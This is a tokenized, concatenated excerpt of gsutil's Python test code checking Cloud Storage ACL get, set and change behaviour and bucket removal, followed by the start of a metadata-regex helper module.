bucket_uri = bucket_uri , contents = '<STR_LIT:data>' ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> self . RunGsUtil ( [ '<STR_LIT>' , inpath , uri . uri ] ) <EOL> lines = self . AssertNObjectsInBucket ( bucket_uri , <NUM_LIT:2> , versioned = True ) <EOL> v0_uri_str , v1_uri_str = lines [ <NUM_LIT:0> ] , lines [ <NUM_LIT:1> ] <EOL> orig_acls = [ ] <EOL> for uri_str in ( v0_uri_str , v1_uri_str ) : <EOL> acl = self . RunGsUtil ( self . _get_acl_prefix + [ uri_str ] , <EOL> return_stdout = True ) <EOL> self . assertNotIn ( PUBLIC_READ_JSON_ACL_TEXT , <EOL> self . _strip_json_whitespace ( acl ) ) <EOL> orig_acls . 
append ( acl ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ '<STR_LIT>' , v0_uri_str ] ) <EOL> acl = self . RunGsUtil ( self . _get_acl_prefix + [ v0_uri_str ] , <EOL> return_stdout = True ) <EOL> self . assertIn ( PUBLIC_READ_JSON_ACL_TEXT , self . _strip_json_whitespace ( acl ) ) <EOL> acl = self . RunGsUtil ( self . _get_acl_prefix + [ v1_uri_str ] , <EOL> return_stdout = True ) <EOL> self . assertNotIn ( PUBLIC_READ_JSON_ACL_TEXT , <EOL> self . _strip_json_whitespace ( acl ) ) <EOL> acl = self . RunGsUtil ( self . _get_acl_prefix + [ uri . uri ] , return_stdout = True ) <EOL> self . assertEqual ( acl , orig_acls [ <NUM_LIT:0> ] ) <EOL> def _strip_json_whitespace ( self , json_text ) : <EOL> return re . sub ( r'<STR_LIT>' , '<STR_LIT>' , json_text ) <EOL> def testAclChangeWithUserId ( self ) : <EOL> change = aclhelpers . AclChange ( self . USER_TEST_ID + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . USER ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . USER_TEST_ID ) <EOL> def testAclChangeWithGroupId ( self ) : <EOL> change = aclhelpers . AclChange ( self . GROUP_TEST_ID + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ID ) <EOL> def testAclChangeWithUserEmail ( self ) : <EOL> change = aclhelpers . AclChange ( self . USER_TEST_ADDRESS + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . USER ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . 
logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . USER_TEST_ADDRESS ) <EOL> def testAclChangeWithGroupEmail ( self ) : <EOL> change = aclhelpers . AclChange ( self . GROUP_TEST_ADDRESS + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> def testAclChangeWithDomain ( self ) : <EOL> change = aclhelpers . AclChange ( self . DOMAIN_TEST + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . DOMAIN_TEST ) <EOL> def testAclChangeWithProjectOwners ( self ) : <EOL> change = aclhelpers . AclChange ( self . _project_test_acl + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . PROJECT ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . _project_test_acl ) <EOL> def testAclChangeWithAllUsers ( self ) : <EOL> change = aclhelpers . AclChange ( '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testAclChangeWithAllAuthUsers ( self ) : <EOL> change = aclhelpers . AclChange ( '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . 
GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' ) <EOL> remove = aclhelpers . AclDel ( '<STR_LIT>' ) <EOL> remove . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHasNo ( acl , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testAclDelWithUser ( self ) : <EOL> add = aclhelpers . AclChange ( self . USER_TEST_ADDRESS + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . USER ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> add . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . USER_TEST_ADDRESS ) <EOL> remove = aclhelpers . AclDel ( self . USER_TEST_ADDRESS ) <EOL> remove . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHasNo ( acl , '<STR_LIT>' , '<STR_LIT>' , self . USER_TEST_ADDRESS ) <EOL> def testAclDelWithProjectOwners ( self ) : <EOL> add = aclhelpers . AclChange ( self . _project_test_acl + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . PROJECT ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> add . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . _project_test_acl ) <EOL> remove = aclhelpers . AclDel ( self . _project_test_acl ) <EOL> remove . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHasNo ( acl , '<STR_LIT>' , '<STR_LIT>' , self . _project_test_acl ) <EOL> def testAclDelWithGroup ( self ) : <EOL> add = aclhelpers . AclChange ( self . USER_TEST_ADDRESS + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . 
BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> add . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . USER_TEST_ADDRESS ) <EOL> remove = aclhelpers . AclDel ( self . USER_TEST_ADDRESS ) <EOL> remove . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHasNo ( acl , '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> def _AssertHas ( self , current_acl , perm , scope , value = None ) : <EOL> matches = list ( self . _YieldMatchingEntriesJson ( current_acl , perm , scope , <EOL> value ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( matches ) ) <EOL> def _AssertHasNo ( self , current_acl , perm , scope , value = None ) : <EOL> matches = list ( self . _YieldMatchingEntriesJson ( current_acl , perm , scope , <EOL> value ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( matches ) ) <EOL> def _YieldMatchingEntriesJson ( self , current_acl , perm , scope , value = None ) : <EOL> """<STR_LIT>""" <EOL> for entry in current_acl : <EOL> if ( scope in [ '<STR_LIT>' , '<STR_LIT>' ] and <EOL> entry . entityId and value == entry . entityId and <EOL> entry . role == perm ) : <EOL> yield entry <EOL> elif ( scope in [ '<STR_LIT>' , '<STR_LIT>' ] and <EOL> entry . email and value == entry . email and <EOL> entry . role == perm ) : <EOL> yield entry <EOL> elif ( scope == '<STR_LIT>' and <EOL> entry . domain and value == entry . domain and <EOL> entry . role == perm ) : <EOL> yield entry <EOL> elif ( scope == '<STR_LIT>' and entry . role == perm and <EOL> value == entry . entityId ) : <EOL> yield entry <EOL> elif ( scope in [ '<STR_LIT>' , '<STR_LIT>' ] and <EOL> entry . entity . lower ( ) == scope . lower ( ) and <EOL> entry . role == perm ) : <EOL> yield entry <EOL> def _MakeScopeRegex ( self , role , entity_type , email_address ) : <EOL> template_regex = ( r'<STR_LIT>' % <EOL> ( entity_type , email_address , role ) ) <EOL> return re . 
compile ( template_regex , flags = re . DOTALL ) <EOL> def _MakeProjectScopeRegex ( self , role , project_team ) : <EOL> template_regex = ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' ) % ( project_team , project_team , <EOL> role ) <EOL> return re . compile ( template_regex , flags = re . DOTALL ) <EOL> def testBucketAclChange ( self ) : <EOL> """<STR_LIT>""" <EOL> test_regex = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT:user>' , self . USER_TEST_ADDRESS ) <EOL> json_text = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . USER_TEST_ADDRESS + '<STR_LIT>' , suri ( self . sample_uri ) ] ) <EOL> json_text = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> test_regex2 = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT:user>' , self . USER_TEST_ADDRESS ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . USER_TEST_ADDRESS + '<STR_LIT>' , suri ( self . sample_uri ) ] ) <EOL> json_text2 = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text2 , test_regex2 ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . USER_TEST_ADDRESS , suri ( self . sample_uri ) ] ) <EOL> json_text3 = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text3 , test_regex ) <EOL> def testProjectAclChangesOnBucket ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . test_api == ApiSelector . XML : <EOL> stderr = self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . 
_project_test_acl + '<STR_LIT>' , <EOL> suri ( self . sample_uri ) ] , <EOL> expected_status = <NUM_LIT:1> , <EOL> return_stderr = True ) <EOL> self . assertIn ( ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , stderr ) <EOL> else : <EOL> test_regex = self . _MakeProjectScopeRegex ( <EOL> '<STR_LIT>' , self . _project_team ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . _project_test_acl + '<STR_LIT>' , <EOL> suri ( self . sample_uri ) ] ) <EOL> json_text = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> proj_num_id = test_regex . search ( json_text ) . group ( <NUM_LIT:1> ) <EOL> acl_to_remove = '<STR_LIT>' % ( self . _project_team , proj_num_id ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , acl_to_remove , suri ( self . sample_uri ) ] ) <EOL> json_text2 = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text2 , test_regex ) <EOL> def testObjectAclChange ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = self . CreateObject ( bucket_uri = self . sample_uri , contents = '<STR_LIT>' ) <EOL> self . AssertNObjectsInBucket ( self . sample_uri , <NUM_LIT:1> ) <EOL> test_regex = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS + '<STR_LIT>' , suri ( obj ) ] ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> test_regex2 = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . 
GROUP_TEST_ADDRESS ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS + '<STR_LIT>' , suri ( obj ) ] ) <EOL> json_text2 = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text2 , test_regex2 ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS , suri ( obj ) ] ) <EOL> json_text3 = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text3 , test_regex2 ) <EOL> all_auth_regex = re . compile ( <EOL> r'<STR_LIT>' , <EOL> flags = re . DOTALL ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + [ '<STR_LIT>' , '<STR_LIT>' , suri ( obj ) ] ) <EOL> json_text4 = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text4 , all_auth_regex ) <EOL> def testObjectAclChangeAllUsers ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = self . CreateObject ( bucket_uri = self . sample_uri , contents = '<STR_LIT>' ) <EOL> self . AssertNObjectsInBucket ( self . sample_uri , <NUM_LIT:1> ) <EOL> all_users_regex = re . compile ( <EOL> r'<STR_LIT>' , flags = re . DOTALL ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , all_users_regex ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , '<STR_LIT>' , suri ( obj ) ] ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , all_users_regex ) <EOL> def testMultithreadedAclChange ( self , count = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> objects = [ ] <EOL> for i in range ( count ) : <EOL> objects . append ( self . CreateObject ( <EOL> bucket_uri = self . 
sample_uri , <EOL> contents = '<STR_LIT>' . format ( i ) ) ) <EOL> self . AssertNObjectsInBucket ( self . sample_uri , count ) <EOL> test_regex = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> json_texts = [ ] <EOL> for obj in objects : <EOL> json_texts . append ( self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( obj ) ] , return_stdout = True ) ) <EOL> for json_text in json_texts : <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> uris = [ suri ( obj ) for obj in objects ] <EOL> self . RunGsUtil ( [ '<STR_LIT>' , '<STR_LIT>' ] + self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS + '<STR_LIT>' ] + uris ) <EOL> json_texts = [ ] <EOL> for obj in objects : <EOL> json_texts . append ( self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( obj ) ] , return_stdout = True ) ) <EOL> for json_text in json_texts : <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> def testRecursiveChangeAcl ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = self . CreateObject ( bucket_uri = self . sample_uri , object_name = '<STR_LIT>' , <EOL> contents = '<STR_LIT>' ) <EOL> self . AssertNObjectsInBucket ( self . sample_uri , <NUM_LIT:1> ) <EOL> test_regex = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> @ Retry ( AssertionError , tries = <NUM_LIT:5> , timeout_secs = <NUM_LIT:1> ) <EOL> def _AddAcl ( ) : <EOL> self . RunGsUtil ( <EOL> self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS + '<STR_LIT>' , suri ( obj ) [ : - <NUM_LIT:3> ] ] ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . 
assertRegexpMatches ( json_text , test_regex ) <EOL> _AddAcl ( ) <EOL> @ Retry ( AssertionError , tries = <NUM_LIT:5> , timeout_secs = <NUM_LIT:1> ) <EOL> def _DeleteAcl ( ) : <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS , suri ( obj ) ] ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> _DeleteAcl ( ) <EOL> def testMultiVersionSupport ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket = self . CreateVersionedBucket ( ) <EOL> object_name = self . MakeTempName ( '<STR_LIT>' ) <EOL> self . CreateObject ( <EOL> bucket_uri = bucket , object_name = object_name , contents = '<STR_LIT>' ) <EOL> self . CreateObject ( <EOL> bucket_uri = bucket , object_name = object_name , contents = '<STR_LIT>' ) <EOL> lines = self . AssertNObjectsInBucket ( bucket , <NUM_LIT:2> , versioned = True ) <EOL> obj_v1 , obj_v2 = lines [ <NUM_LIT:0> ] , lines [ <NUM_LIT:1> ] <EOL> test_regex = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ obj_v1 ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS + '<STR_LIT>' , obj_v1 ] ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ obj_v1 ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ obj_v2 ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> def testBadRequestAclChange ( self ) : <EOL> stdout , stderr = self . RunGsUtil ( <EOL> self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , '<STR_LIT>' , suri ( self . 
sample_uri ) ] , <EOL> return_stdout = True , return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . assertNotIn ( '<STR_LIT>' , stdout ) <EOL> self . assertNotIn ( '<STR_LIT>' , stderr ) <EOL> def testAclGetWithoutFullControl ( self ) : <EOL> object_uri = self . CreateObject ( contents = '<STR_LIT:foo>' ) <EOL> with self . SetAnonymousBotoCreds ( ) : <EOL> stderr = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( object_uri ) ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def testTooFewArgumentsFails ( self ) : <EOL> """<STR_LIT>""" <EOL> stderr = self . RunGsUtil ( self . _get_acl_prefix , return_stderr = True , <EOL> expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix , return_stderr = True , <EOL> expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> stderr = self . RunGsUtil ( self . _ch_acl_prefix , return_stderr = True , <EOL> expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> stderr = self . RunGsUtil ( [ '<STR_LIT>' ] , return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def testMinusF ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = self . CreateBucket ( ) <EOL> obj_uri = suri ( self . CreateObject ( bucket_uri = bucket_uri , object_name = '<STR_LIT:foo>' , <EOL> contents = '<STR_LIT:foo>' ) ) <EOL> acl_string = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + <EOL> [ '<STR_LIT>' , '<STR_LIT>' , suri ( bucket_uri ) + '<STR_LIT>' , obj_uri ] , <EOL> expected_status = <NUM_LIT:1> ) <EOL> acl_string2 = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> self . 
assertNotEqual ( acl_string , acl_string2 ) <EOL> class TestS3CompatibleAcl ( TestAclBase ) : <EOL> """<STR_LIT>""" <EOL> def testAclObjectGetSet ( self ) : <EOL> bucket_uri = self . CreateBucket ( ) <EOL> obj_uri = self . CreateObject ( bucket_uri = bucket_uri , contents = '<STR_LIT:foo>' ) <EOL> self . AssertNObjectsInBucket ( bucket_uri , <NUM_LIT:1> ) <EOL> stdout = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj_uri ) ] , <EOL> return_stdout = True ) <EOL> set_contents = self . CreateTempFile ( contents = stdout ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ set_contents , suri ( obj_uri ) ] ) <EOL> def testAclBucketGetSet ( self ) : <EOL> bucket_uri = self . CreateBucket ( ) <EOL> stdout = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( bucket_uri ) ] , <EOL> return_stdout = True ) <EOL> set_contents = self . CreateTempFile ( contents = stdout ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ set_contents , suri ( bucket_uri ) ] ) <EOL> @ SkipForGS ( '<STR_LIT>' ) <EOL> class TestS3OnlyAcl ( TestAclBase ) : <EOL> """<STR_LIT>""" <EOL> def test_set_xml_acl ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , obj_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . assertNotIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_xml_acl_bucket ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = suri ( self . CreateBucket ( ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , bucket_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . 
assertNotIn ( '<STR_LIT>' , stderr ) <EOL> class TestAclOldAlias ( TestAcl ) : <EOL> _set_acl_prefix = [ '<STR_LIT>' ] <EOL> _get_acl_prefix = [ '<STR_LIT>' ] <EOL> _set_defacl_prefix = [ '<STR_LIT>' ] <EOL> _ch_acl_prefix = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import gslib . tests . testcase as testcase <EOL> from gslib . tests . util import ObjectToURI as suri <EOL> class TestRb ( testcase . GsUtilIntegrationTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_rb_bucket_works ( self ) : <EOL> bucket_uri = self . CreateBucket ( ) <EOL> self . RunGsUtil ( [ '<STR_LIT:rb>' , suri ( bucket_uri ) ] ) <EOL> stderr = self . RunGsUtil ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % self . nonexistent_bucket_name ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_rb_bucket_not_empty ( self ) : <EOL> bucket_uri = self . CreateBucket ( test_objects = <NUM_LIT:1> ) <EOL> stderr = self . RunGsUtil ( [ '<STR_LIT:rb>' , suri ( bucket_uri ) ] , expected_status = <NUM_LIT:1> , <EOL> return_stderr = True ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_rb_versioned_bucket_not_empty ( self ) : <EOL> bucket_uri = self . CreateVersionedBucket ( test_objects = <NUM_LIT:1> ) <EOL> stderr = self . RunGsUtil ( [ '<STR_LIT:rb>' , suri ( bucket_uri ) ] , expected_status = <NUM_LIT:1> , <EOL> return_stderr = True ) <EOL> self . assertIn ( '<STR_LIT>' , <EOL> stderr ) <EOL> def test_rb_nonexistent_bucket ( self ) : <EOL> stderr = self . RunGsUtil ( [ '<STR_LIT:rb>' , '<STR_LIT>' % self . nonexistent_bucket_name ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_rb_minus_f ( self ) : <EOL> bucket_uri = self . CreateBucket ( ) <EOL> stderr = self . RunGsUtil ( [ <EOL> '<STR_LIT:rb>' , '<STR_LIT>' , '<STR_LIT>' % self . nonexistent_bucket_name , <EOL> suri ( bucket_uri ) ] , return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertNotIn ( '<STR_LIT>' , stderr ) <EOL> stderr = self . 
RunGsUtil ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , suri ( bucket_uri ) ] , return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import datetime <EOL> import json <EOL> import re <EOL> import textwrap <EOL> import xml . etree . ElementTree <EOL> from apitools . base . py import encoding <EOL> import boto <EOL> from boto . gs . acl import ACL <EOL> from boto . gs . acl import ALL_AUTHENTICATED_USERS <EOL> from boto . gs . acl import ALL_USERS <EOL> from boto . gs . acl import Entries <EOL> from boto . gs . acl import Entry <EOL> from boto . gs . acl import GROUP_BY_DOMAIN <EOL> from boto . gs . acl import GROUP_BY_EMAIL <EOL> from boto . gs . acl import GROUP_BY_ID <EOL> from boto . gs . acl import USER_BY_EMAIL <EOL> from boto . gs . acl import USER_BY_ID <EOL> from gslib . cloud_api import ArgumentException <EOL> from gslib . cloud_api import BucketNotFoundException <EOL> from gslib . cloud_api import NotFoundException <EOL> from gslib . cloud_api import Preconditions <EOL> from gslib . exception import CommandException <EOL> from gslib . third_party . storage_apitools import storage_v1_messages as apitools_messages <EOL> try : <EOL> from xml . etree . ElementTree import ParseError as XmlParseError <EOL> except ImportError : <EOL> from xml . parsers . expat import ExpatError as XmlParseError <EOL> CACHE_CONTROL_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CONTENT_DISPOSITION_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CONTENT_ENCODING_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CONTENT_LANGUAGE_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CONTENT_MD5_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> CONTENT_TYPE_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> GOOG_API_VERSION_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> GOOG_GENERATION_MATCH_REGEX = re . compile ( r'<STR_LIT>' , re . I ) <EOL> GOOG_METAGENERATION_MATCH_REGEX = re . compile ( <EOL> r'<STR_LIT>' , re . I ) <EOL> CUSTOM_GOOG_METADATA_REGEX = re . compile ( r'<STR_LIT>' , <EOL> re . 
